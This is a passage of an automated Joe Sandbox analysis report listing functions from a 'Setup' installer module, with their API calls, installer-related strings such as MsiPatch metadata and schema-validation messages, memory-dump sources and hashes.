                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • SysAllocString.OLEAUT32(?), ref: 6C958F31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$AllocString
                                                              • String ID: </MsiPatch>$<MsiPatch
                                                              • API String ID: 99483316-2338456224
                                                              • Opcode ID: 0eb0a8af9d9e1781a3e9ad907900963d7cdf2120f1486327e2ce253b46e8c881
                                                              • Instruction ID: 4d025a6a238cc8a35c9c53ecf256f3e97e9e00e8deba62110c62d284a96d2b20
                                                              • Opcode Fuzzy Hash: 0eb0a8af9d9e1781a3e9ad907900963d7cdf2120f1486327e2ce253b46e8c881
                                                              • Instruction Fuzzy Hash: 87216F70601208EFCB09DFB8C8409DD7761BF35328B20865AE835DBB91DB30DA18C799
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C916CC4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C916CCB
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C915A22: __EH_prolog3.LIBCMT ref: 6C915A29
                                                                • Part of subcall function 6C915A22: #8.MSI(?,?,?,?,` WHERE ,?,00000000,?,` FROM `,?,SELECT `,00000014,6C916D4B,?,?,?), ref: 6C915AF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: MsiPatchMetadata$Value$`Property` = 'DisplayName'
                                                              • API String ID: 431132790-332461799
                                                              • Opcode ID: 0a99aac7ebaa74e7a6b4cf04506073056a0cf934fd929cfce5db3837af016f73
                                                              • Instruction ID: 885f1db60aa590b2b6162683c1bfa32babba89cb544277a266a1e37c743cbe69
                                                              • Opcode Fuzzy Hash: 0a99aac7ebaa74e7a6b4cf04506073056a0cf934fd929cfce5db3837af016f73
                                                              • Instruction Fuzzy Hash: D7214F7280014DABCF10DFE8C941ADEB7B9BF74318F148556E524E7B41C730DA198BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C93CE95 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CountTick__aulldiv
                                                              • String ID: (ActionData)$Setting Progress: ticks, soFar = %d, %d %s
                                                              • API String ID: 3746106513-4185375322
                                                              • Opcode ID: 752f28328355e5dc42013acb995ffa70d4b882cb63ab63fe0e7448392b3f91fa
                                                              • Instruction ID: 507fed396ad11939856cb7cf4759c2de5054f0b8cf1f9fa3e4fcc9ba776c42c1
                                                              • Opcode Fuzzy Hash: 752f28328355e5dc42013acb995ffa70d4b882cb63ab63fe0e7448392b3f91fa
                                                              • Instruction Fuzzy Hash: 9701DB72600A697FD720AA68CC45EAA3B9D9F653A4F108314F518CBAC1C731DC54C7F0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C931D32 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C931D78
                                                              • schema validation failure: Install action is not supported in the ActionTable for RelatedProducts., xrefs: 6C931D66
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: ParameterInfo.xml$schema validation failure: Install action is not supported in the ActionTable for RelatedProducts.
                                                              • API String ID: 3670251406-470515384
                                                              • Opcode ID: f193094b52ac6b1dc29b3ad4f03de9d0ed67117d18aafa180e24ffe38a8e0f41
                                                              • Instruction ID: 7382971d4270d13003031460e15cb3a8aa39c79aa89b4bf1c6e7f07a5faec4d1
                                                              • Opcode Fuzzy Hash: f193094b52ac6b1dc29b3ad4f03de9d0ed67117d18aafa180e24ffe38a8e0f41
                                                              • Instruction Fuzzy Hash: 2A117071801208DFDF29CBA4C854FED33B8AF22318F548659E1249BEE1C774D689CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C962F7A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C962F81
                                                              • CoInitialize.OLE32(00000000), ref: 6C962FAC
                                                                • Part of subcall function 6C941D31: __EH_prolog3.LIBCMT ref: 6C941D38
                                                              • GetCurrentThreadId.KERNEL32 ref: 6C962FFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CurrentInitializeThread
                                                              • String ID: PBH
                                                              • API String ID: 1175431296-622276336
                                                              • Opcode ID: 4b3d27afe88a25a314690c431c2e5c7537d8b461ed85ec24831a12f033ea5962
                                                              • Instruction ID: 45f1bf162ba97dedb65e9321781b50b484bb356471bf4ad044c89120a8658d0a
                                                              • Opcode Fuzzy Hash: 4b3d27afe88a25a314690c431c2e5c7537d8b461ed85ec24831a12f033ea5962
                                                              • Instruction Fuzzy Hash: 580125B4501B05CFDB62CF69C48868AFBE8BF65308F10480EE4AA87750C774E619CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C942C0A Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C942C11
                                                              • GetSidLengthRequired.ADVAPI32(0C75FF50,00000050,6C942F2A,6C900B54,00000002,00000020,00000222,00000000,?,?,6C9448E0), ref: 6C942C75
                                                              • InitializeSid.ADVAPI32(0000000F,00000009,0C75FF50,?,?,6C9448E0), ref: 6C942C88
                                                              • GetSidSubAuthority.ADVAPI32(0000000F,00000000,?,?,6C9448E0), ref: 6C942CAF
                                                                • Part of subcall function 6C9684F6: GetLastError.KERNEL32(6C942C97,?,?,6C9448E0), ref: 6C9684F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AuthorityErrorH_prolog3_InitializeLastLengthRequired
                                                              • String ID:
                                                              • API String ID: 1730150861-0
                                                              • Opcode ID: 3dee1f5274ea5358b4f6c559a592dd011bd72a7638a21d07d40103883ee05c89
                                                              • Instruction ID: 649320cc7fd4fa6fb38dc4de662dd5d565e9870beed2dba0730b4d79728ee632
                                                              • Opcode Fuzzy Hash: 3dee1f5274ea5358b4f6c559a592dd011bd72a7638a21d07d40103883ee05c89
                                                              • Instruction Fuzzy Hash: BA21AEB0A00289DBDB04DFE1C4847DCBBB8BF25309F108029D605ABB40C735E91CCBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C963FAB Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C963FB2
                                                              • CoInitialize.OLE32(00000000), ref: 6C963FD4
                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C963FF0
                                                              • InitializeCriticalSection.KERNEL32(?), ref: 6C96405A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Initialize$CreateCriticalEventH_prolog3Section
                                                              • String ID:
                                                              • API String ID: 1191084466-0
                                                              • Opcode ID: 1a4c65e3bf8867ced9570f742c509014bcdd152872d35b811ebb32f0f4a04ff3
                                                              • Instruction ID: ed0bc53a5c23b35e9e9914040ad3078a92a787f260b67fac533e25bf3718f1b3
                                                              • Opcode Fuzzy Hash: 1a4c65e3bf8867ced9570f742c509014bcdd152872d35b811ebb32f0f4a04ff3
                                                              • Instruction Fuzzy Hash: A72126B0901201DFDB21CF5AC588996FBF8FFA5304B14846FE8998BA26C7B4C044CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C928E28 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C928E2F
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_memcpy_s
                                                              • String ID: EstimatedInstallTime$LogFileHint
                                                              • API String ID: 1663610674-3554194153
                                                              • Opcode ID: 03e5a085e7730599b77d14f744bd5c20b2d1a2fd53423ee49179d1f107cada5a
                                                              • Instruction ID: 3f123126e1d4837692de7a15532a4e8b72ce0e8b790f4db7c38031e88f893298
                                                              • Opcode Fuzzy Hash: 03e5a085e7730599b77d14f744bd5c20b2d1a2fd53423ee49179d1f107cada5a
                                                              • Instruction Fuzzy Hash: 429155B1601249DFEF14CFA8C981BD97BB4BF29308F1485AAE8589FB55C734DA04CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C918D44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 178COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • schema validation failure: child element not found - , xrefs: 6C918E7D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: schema validation failure: child element not found -
                                                              • API String ID: 3670251406-3859288074
                                                              • Opcode ID: ab772aee5e9397744b5632ff1a953ac28bbcd2583367160b74b3cc02632ec5c7
                                                              • Instruction ID: b871e7d46f70383ed6194ff7efafef9b1a1a36740d8a181acaeec0caf0a6e62f
                                                              • Opcode Fuzzy Hash: ab772aee5e9397744b5632ff1a953ac28bbcd2583367160b74b3cc02632ec5c7
                                                              • Instruction Fuzzy Hash: FA717C7190524DDFCB05CFA4C944AEEBBB9BF65308F24454AE411EBB80CB70EA05DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C932DBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C932DC3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: ImageName$ProcessBlock
                                                              • API String ID: 431132790-2988717093
                                                              • Opcode ID: 12dfb7f06deb5e585e7f7c4d3f18b35970ab4d83fa0663e9037525d768dd511f
                                                              • Instruction ID: 9055688548b56d0c8a5e8f879c797bb07459ff37609f25790757d976a4adb7b8
                                                              • Opcode Fuzzy Hash: 12dfb7f06deb5e585e7f7c4d3f18b35970ab4d83fa0663e9037525d768dd511f
                                                              • Instruction Fuzzy Hash: 1621627060120AEFDB14DFA8C945BAD7BB9BF15358F108558F424EBB81C770DA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C937F3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 6C937F72
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              • _wcstoul.LIBCMT ref: 6C937FAA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionException@8ThrowUser_wcstoul
                                                              • String ID: W
                                                              • API String ID: 3061576314-655174618
                                                              • Opcode ID: 40a8dd38b2ae70eb1e1233536a373d61579c6f4c808cdabee626ba31e8213c49
                                                              • Instruction ID: 498bcf57531f9a93cb87f9183d164f11800ccae1acda158cce9c2d58eddeda75
                                                              • Opcode Fuzzy Hash: 40a8dd38b2ae70eb1e1233536a373d61579c6f4c808cdabee626ba31e8213c49
                                                              • Instruction Fuzzy Hash: BB117076D00218EBDB00DFA5C844AEEF3B8FF14314F10456AE465A7641E774DA04CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C952E83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C952E8A
                                                              • _wcstoul.LIBCMT ref: 6C952EF4
                                                                • Part of subcall function 6C96B6D0: wcstoxl.LIBCMT ref: 6C96B6E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_wcstoulwcstoxl
                                                              • String ID: 0x%x
                                                              • API String ID: 3147468384-1033910204
                                                              • Opcode ID: be7c87201e526445fb9f092c5664532c0af9dac820e7b64aa64258de25f80523
                                                              • Instruction ID: 684503e7eaedd4afcf5ffafaf677e1360507ba01d480cf70f738fc7cfbdb26d3
                                                              • Opcode Fuzzy Hash: be7c87201e526445fb9f092c5664532c0af9dac820e7b64aa64258de25f80523
                                                              • Instruction Fuzzy Hash: 29119EB2900208ABDB14DF64CC05BAE77B5BF21319F048516F804ABB90D775DE299BD9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95FC46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95FC4D
                                                              • GetLastError.KERNEL32(?,?,?,6C95CE79,00000000,6C95BCC4,?,80070057,?,InvalidArguments,?,00000000,?,ParameterInfo.xml,?,?), ref: 6C95FC73
                                                              Strings
                                                              • Failed to record TimeToFirstWindow, xrefs: 6C95FC8D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last
                                                              • String ID: Failed to record TimeToFirstWindow
                                                              • API String ID: 685212868-1716191741
                                                              • Opcode ID: 217afc81af42677a2fe5d6c508dcb4f381f967795b08add01227817661c1e0e8
                                                              • Instruction ID: 548c84968fd5cf45db0e0fdf1811333eda7c6125f348139d56e3222f5eec75fa
                                                              • Opcode Fuzzy Hash: 217afc81af42677a2fe5d6c508dcb4f381f967795b08add01227817661c1e0e8
                                                              • Instruction Fuzzy Hash: 33016271201201ABD724CF65C905BA67B69AF653ACF50C528F815CBE80C734E515CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C914E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C914E11
                                                                • Part of subcall function 6C914FAC: _memset.LIBCMT ref: 6C914FB4
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3__memset
                                                              • String ID: %d.%d.%d$Error
                                                              • API String ID: 755347604-3400412798
                                                              • Opcode ID: affbdb768055e02d091b952b5d9eca25715c130edbc7406af007376b97e3cd77
                                                              • Instruction ID: 4e0867f1563df65391a7055f1de2550d82e7e5bd77cc94829d1c7d0f0f83a201
                                                              • Opcode Fuzzy Hash: affbdb768055e02d091b952b5d9eca25715c130edbc7406af007376b97e3cd77
                                                              • Instruction Fuzzy Hash: 62018B329101189BDF229B60CC117CCB3B5BF69308F040896E044A7F42D731DAA9CF84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C914D35 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • An internal or user error was encountered., xrefs: 6C914D6E
                                                              • A StopBlock was hit or a System Requirement was not met., xrefs: 6C914D77
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: A StopBlock was hit or a System Requirement was not met.$An internal or user error was encountered.
                                                              • API String ID: 431132790-2578323181
                                                              • Opcode ID: 450c3afbb1201a4ef82e83201e9a59d6bdfded082bf4f2ce42026ee51481893a
                                                              • Instruction ID: f351bb5aadefafbc463885c9e45d9bcc44cb19cedfafd303acffa2b73d7d2fb7
                                                              • Opcode Fuzzy Hash: 450c3afbb1201a4ef82e83201e9a59d6bdfded082bf4f2ce42026ee51481893a
                                                              • Instruction Fuzzy Hash: 41F0E5716506099BEB209B98C6057AC32646B6071EF004801E010AFFC0C7B9DA18CB9E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%